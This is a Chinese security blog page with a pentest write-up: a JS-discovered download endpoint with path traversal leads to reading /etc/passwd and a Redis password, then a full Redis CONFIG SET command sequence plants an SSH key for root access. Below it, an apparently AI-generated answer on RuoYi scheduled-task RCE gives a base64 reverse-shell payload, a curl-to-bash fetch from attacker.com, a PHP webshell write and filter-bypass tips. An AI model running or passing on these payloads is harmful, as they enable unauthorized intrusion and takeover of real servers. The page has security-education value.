分析Js到GetShell

最新推荐文章于 2024-05-29 09:24:28 发布
最新推荐文章于 2024-05-29 09:24:28 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: Web安全 文章标签: 网络安全 js
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pyth0zn/article/details/127204479
版权

声明 

   免责声明:本文为个人作品,只做技术研究,只可用于正常的技术交流与学习,不可用于灰黑产业,不可从事违法犯罪行,严禁利用本文所介绍的技术进行未授权的恶意攻击,否则,后果自负!!!

测试某系统,常规的功能点完后,发现没有什么有价值的洞,

F12 全局搜索 download 发现一处get接口

 使用burp访问发现500错误,应该是缺少参数

 使用x8 FUZZ参数

两秒之后 就出结果,发现存在path 参数

 访问之,提示文件不存在,有戏

尝试访问 etc/passwd,成功读取

 

读root用户的hisotry,发现开了10022 作为ssh端口

开启了 密钥登陆

 存在redis

 

读取redis密码

 

nmap发现6379也是开放,既然是root账户 直接 写个ssh公钥进去

 


ssh-keygen -t rsa
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > /tmp/key.txt
cat key.txt|redis-cli -h xxx.xx.xx.xx -a 'Pxxx3' -x set crack

# 链接redis
redis-cli -h xxx.xx -a 'Paxxxx123'


#获取redis备份的路径
CONFIG GET dir  # 截图忘记

#更改redis备份路径
CONFIG SET dir /root/.ssh

#设置备份文件的名称为authorized_keys
CONFIG SET dbfilename authorized_keys

#检查是否更改
CONFIG GET dbfilename
# 保存
save

 ssh -p10022 root@xxx.xxx.xxx 成功链接

 

 

dede ad_js.php getshell,nday漏洞还原分析之dedecms后台getshell
weixin_34151001的博客
03-29 636
前言最近发现 dedecms 的 nday后台getshell ,于是打算还原一下。根据日志显示,攻击者访问了 dede/ad_add.php 文件后,转而访问 plus/ad_js.php 文件,提交的 payload 为 plus/ad_js.php?nocache=1&aid=1&_=whoami 。前期准备我们先来看一下 dede/ad_add.php 文件。可以看到这是一...
【Vulfocus解题复现】tomcat-pass-getshell 弱口令
温氏效应
11-15 3981
漏洞介绍 名称:Tomcat-pass-getshell 弱口令 描述:Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell 解题过程 1、打开靶场环境,并点击Manage App链接,通过弱口令登录平台,账号密码均为:tomcat 2、拖动页面,找到war上传区域,上传jsp木马: 制作jsp木马,.
jsgetshell
weixin_50464560的博客
07-22 618
看到望海师傅的山理证书真滴好看,真想搞一本,刚刚入edusrc的时候收集了一波山理的子域资产,全部看了一遍都被大佬挖的干干净净了。没有内网VPN基本上挖不到,然后我就去公众号看了一下,找到了一个系统 首先来点团队特色F12大法,查看html源码发现一处js 发现登录后直接跳转这个地址 直接访问看看有没有未授权漏洞http://xx.xx.xx.xx/index.jsp 访问了好吧,是首页。。打扰了但是我不甘心,我再用F12大法,发现了index.js 访问http://xx.xx.xx.xx/index.
SRC挖掘技巧—写js代码就能getshell
pyth0zn的博客
10-16 1776
发现算法编辑器->尝试执行nodejs 代码执行->发现调用得是java Nashorn引擎->写js代码调用java 方法执行代码->over!继续看资料 发现 通过 框架可以通过js创建java 对象 使用关键字 Java.type 就可以。通过上面报错发现用了java的框架 来执行js 查一下api 教程 ,参考如下资料。发现后端用的node js,尝试写一个nodejs 代码执行。查看格式化按钮旁边的【查看帮助接口】 看到里面写的特别像js 代码。打开后看看,可以写代码。用以下样例脚本测试下。
js跳转https_从JS敏感信息泄露到GETSHELL
weixin_36424234的博客
12-08 264
亲爱的,关注我吧11/3文章共计742个词预计阅读8分钟来和我一起阅读吧作者:果酸为首的苹果本文转自先知社区:https://xz.aliyun.com/t/8441前言小弟新手,大佬勿喷,文章有何不妥,还望大佬们斧正。正文前端时间打HW,拿到一个IP,先在FOFA上搜一下发现这个IP现在开放了三个端口,分别是86,83,82对应不同的后台管理系统先从86端口这个系统入手,界面如图没有验...
实战|全程分析jsgetshell
qq_50854662的博客
09-28 320
本篇转载于https://forum.butian.net/share/260 看到望海师傅的山理证书真滴好看,真想搞一本,刚刚入edusrc的时候收集了一波山理的子域资产,全部看了一遍都被大佬挖的干干净净了。没有内网VPN基本上挖不到,然后我就去公众号看了一下,找到... 看到望海师傅的山理证书真滴好看,真想搞一本,刚刚入edusr
JS敏感信息泄露到GETSHELL
weixin_50464560的博客
08-18 416
前言 小弟新手,大佬勿喷,文章有何不妥,还望大佬们斧正。 正文 前端时间打HW,拿到一个IP,先在FOFA上搜一下 发现这个IP现在开放了三个端口,分别是86,83,82对应不同的后台管理系统 先从86端口这个系统入手,界面如图 没有验证码!我喜欢,掏出我的大宝贝300万大字典对着admin就是一顿爆,然而现实是残酷的。。。 搞不到弱密码,随手查看了一下源代码,发现这里登录成功跳转index.html 直接URL输入xxx.xxx.xxx.xxx:86/index.h...
黑帽SEO从RCE漏洞Get Shell到网站篡改、定向劫持移动端流量实践分析
2301_77732591的博客
04-24 822
篡改黑链一直是网站防护绕不开的风险点,且篡改事件背后一直隐隐约约黑灰产的身影。移动互联网用户基数大,而黑灰产的博彩、色情对移动端流量的需求经久不衰,网站篡改定向劫持移动端流量、黑灰产博彩色情地址只接受来自移动端流量,已经成为黑帽SEO的普及手段。
【XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF
m0_64378913的博客
06-02 4916
(1)了解beEF工具的使用; (2)加深理解XSS漏洞的利用和危害; (3)掌握浏览器劫持的攻击方法; (4)掌握会话劫持的攻击方法; (5)掌握通过XSS漏洞GetShell的方法。
渗透实战:dedeCMS任意用户密码重置到内网getshell
zz12345600354的博客
05-29 1074
DedeCMS是一款国产的开源CMS系统,具有使用简单、功能强大、可扩展性好等特点。然而,像其他CMS系统一样,DedeCMS也存在一些安全问题,其中任意密码重置漏洞是其中一个比较严重的漏洞。通过信息泄露,攻击者可以获取到网站的用户的用户名和一些敏感信息,然后通过利用任意密码重置漏洞,在不知道原密码的情况下,重置管理员账号的密码,从而获取管理员权限。接着,攻击者可以通过后台getshell,获取网站的控制权,进而进行各种恶意操作,如上传恶意文件、篡改网站内容、窃取用户信息等。
任意文件上传getshell
Websec
03-21 8904
漏洞描述:任意文件上传顾名思义就是在文件上传的地方能够上传任意类型的文件,我们可以上传恶意木马文件对其服务器进行攻击。漏洞寻找:通过查看文件上传的地方,通过burpsuite抓包分析其上传点对其文件类型是否做了限制,也可能只是做了前端限制,但是这个都不要紧,直接绕过就行漏洞修复建议:1.文件上传的地方,我们需要对其文件格式做白名单限制,只允许我们需要的文件进行上传即可2.对文件格式进行校验,前端以...
html预览 webshell,RTLO技术与HTML文件是否可以变为WEBSHELL
weixin_28791139的博客
06-28 560
一、浅谈RTLO技术我在FreeBuf上到了 [APT攻击]趋势科技捕获一次APT攻击活动 这篇文章,然后就自己去探探究竟,文章地址在下面RLO控制符是Unicode控制符的一种,使得字符显示从右至左的顺序,攻击者可以利用RTLO技术来达到欺骗目标,从而使得可执行文件的运行。首先Windows系统在解析文件名时,当遇到unicode控制符时,会改变文件名的显示方式,利用这一特性,可以将exe、sc...
html页面执行shell,经过CGI实如今Html页面上执行shell命令
weixin_42498055的博客
06-04 1098
在mac上配置cgi(不用系统自带的apache cgi.)安装cgi1. brew update2. brew install httpd24安装完后,会有以下提示htmlDocumentRoot is /usr/local/var/www.shellThe default ports have been set in /usr/local/etc/httpd/httpd.conf to 808...
html预览 webshell,2020-04-29后门分析、获取webshell的方法
weixin_39747721的博客
06-28 531
大马后门分析首先搭建一个木马将文件拖入虚拟机中当我们登录的时候输入一个错误的密码,提示非法登录查看代码,找出关键字,并将代码复制到新记事本中,将execute换成msgbox然后保存,将文件名改为11.vbs后缀名,然后打开11.vbs文件,ctrl+A ctrl+C ctrl+V 复制粘贴到新建记事本中6 8是后门这是一个后门%号后门又一个后门网页地址后门然后我们将搭建好的后门,进行...
html 上传文件_【实战篇】记一次文件上传漏洞绕过
weixin_39636099的博客
11-25 1406
点击上方“公众号” 可以订阅哦!Hello,各位小伙伴大家好~最近有点高产似母猪~那今天就少写点,简单记录一个文件上传漏洞的绕过吧~(机智如我..)之前也介绍过一期文件上传漏洞:【文件上传与解析】文件上传与解析漏洞总结v1.0一起来看看今天的内容吧。Part.1漏洞挖掘漏洞测试 目标站点登陆后可以上传公司logo:先随意上传一张图片://可以看到文件被重命名了,但返回了路径。直接访问路径...
利用文件名进行GetShell---CTF题目的相关知识解析
rigous的博客
11-27 3855
0x00 今天白老师扔给我了一个虚拟机,里面有4道CTF的相关网站,我检视了一下,主要有四个文件夹,映射到了8081-8084四个端口。还有一个struts的漏洞测试环境。 首先主要看了下8084对应的题目,包括一道php登录绕过和命令执行漏洞,整个解题思路一波三折,很有意思。
网站渗透总结之Getshell用法大全
LinkSLA的博客
11-07 3251
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库
使用Javascript shell解释执行js代码
weixin_41763944的博客
08-06 4256
最近,算法小白在跟着《数据结构与算法javascript描述》这本书学习算法知识。 首先,小白就被难住了。这个js shell是个什么玩意儿。故鼓捣了半天,又几个小时过去了。。。 终于会用了。。写下来,大家自取。也是为了让我自己不会忘记。。。毕竟记性不大忘性大的我。。 1.下载一个符合自己电脑系统的js shell,书里的地址尝试了半天并没有打开,心塞塞,我以为我学校的网络崩掉了。下面的地址...
GETSHELL学习总结
weixin_44508748的博客
06-29 4662
分类 带有漏洞的应用 redis 、tomcat、解析漏洞、编辑器、FTP 常规漏洞 sql注入、上传、文件包含、命令执行、Struts2、代码反序列化 后台拿shell 上传、数据库备份、配置插马 关于各种带有漏洞的应用以及OWASP Top10常规漏洞需要不断的积累,打造自己的核心的知识库,道路且长。本文仅记录最近对常见cms后台getshell的学习总结 网站getshell方法 1.数据库备份拿shell 如果网站后台具有数据库备份功能,可以将webshell格式先修改为允许上传的文件格式如jpg,
若依 定时任务 getshell
最新发布
03-28
<think>好的,我需要帮助用户了解如何利用若依定时任务漏洞获取Shell。首先,我需要回顾用户提供的引用内容,特别是引用[2]和[4],因为它们直接提到了若依系统的定时任务漏洞。 用户提到的引用[2]指出,若依版本低于4.6.2时,后台计划任务没有对调用目标字符串进行校验,允许攻击者执行任意命令。而引用[4]提到新版本采用了黑名单限制某些调用,但可能存在绕过方法。 首先,我需要确定漏洞的基本原理:攻击者通过定时任务功能注入恶意命令,从而执行系统命令获取Shell。步骤可能包括登录后台、创建定时任务、设置恶意调用目标,比如使用Runtime.exec或ProcessBuilder执行反弹Shell命令。 另外,引用[3]提到设置MySQL的general_log来写入Webshell,这可能是一种方法,但需要结合若依系统的数据库配置情况。如果若依使用MySQL且具有写权限,这种方法可行。 还需要考虑权限问题,用户需要获取后台管理员权限才能创建定时任务,所以漏洞利用的前提是已有后台访问权限。同时,新版本可能修补了该漏洞,因此需要确认目标系统的版本。 可能的问题是如何绕过黑名单限制。引用[4]提到屏蔽了ldap、http、rmi等协议,但可能还有其他未被过滤的类或方法,比如使用反射或非标准类来执行命令。 总结步骤应为:1. 获取后台权限;2. 创建定时任务,调用恶意类方法;3. 执行命令写入Webshell或反弹Shell。需要具体举例说明调用的字符串格式,如使用Runtime.getRuntime().exec()执行命令,或者利用数据库日志写入Shell。 同时要提醒用户漏洞修复建议,如升级版本、加强输入校验等。最后生成相关问题,帮助用户深入理解。</think>### 若依定时任务GetShell漏洞利用方法分析 若依(RuoYi)框架在定时任务功能中存在远程代码执行漏洞(RCE),攻击者可通过构造恶意调用字符串实现命令执行并获取Shell。以下是具体利用步骤及原理: --- #### **1. 漏洞核心原理** - **漏洞触发点**:后台计划任务的“调用目标字符串”参数未严格过滤,允许攻击者通过反射机制调用任意类方法[^2][^4]。 - **关键缺陷**:低版本(<4.6.2)未对`调用目标字符串`进行黑名单过滤,可直接调用`java.lang.Runtime`等敏感类执行系统命令。 --- #### **2. 利用步骤** **前提条件**:需获取后台管理员权限(如弱口令、其他漏洞进入后台)。 **步骤一:构造恶意调用字符串** - **直接调用Runtime类**: ```plaintext com.ruoyi.common.utils.StringUtils@getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjMuNDUuNjcuODkvOTAwMCAwPiYx}|{base64,-d}|{bash,-i}") ``` - 解释:Base64编码反弹Shell命令,解码后通过`Runtime.exec`执行。 - **通过ProcessBuilder类**: ```plaintext com.ruoyi.common.utils.StringUtils@getConstructor(String[].class).newInstance(new String[][]{{"bash","-c","curl http://attacker.com/shell.sh | bash"}}).start() ``` - 解释:利用反射调用`ProcessBuilder`执行远程脚本。 **步骤二:绕过黑名单(高版本)** 若目标版本采用黑名单(如过滤`ldap`、`http`、`rmi`),可尝试: - **使用非标准类**:如`javax.script.ScriptEngineManager`执行JavaScript代码。 - **编码混淆**:将命令转换为Hex或Base64编码绕过字符串检测。 **步骤三:获取Shell** - **反弹Shell**:通过上述命令建立反向连接至攻击者服务器。 - **写入Webshell**: ```plaintext com.ruoyi.common.utils.StringUtils@getRuntime().exec("echo '<?php @eval($_POST[cmd]);?>' > /var/www/html/shell.php") ``` - 需确保Web目录有写入权限[^3]。 --- #### **3. 漏洞修复建议** 1. 升级若依至4.6.2及以上版本。 2. 在定时任务调用目标中**强制白名单校验**,仅允许指定类方法。 3. 过滤敏感字符如`Runtime`、`ProcessBuilder`、`bash`等。 --- #### **4. 关联利用工具** - **漏洞检测工具**:使用若依漏洞检测脚本(如GitHub开源项目)验证目标是否存在漏洞。 - **自动化利用**:编写Python脚本模拟后台登录并自动提交恶意定时任务[^2][^4]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

pyth0nn

送人玫瑰,手留余香

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值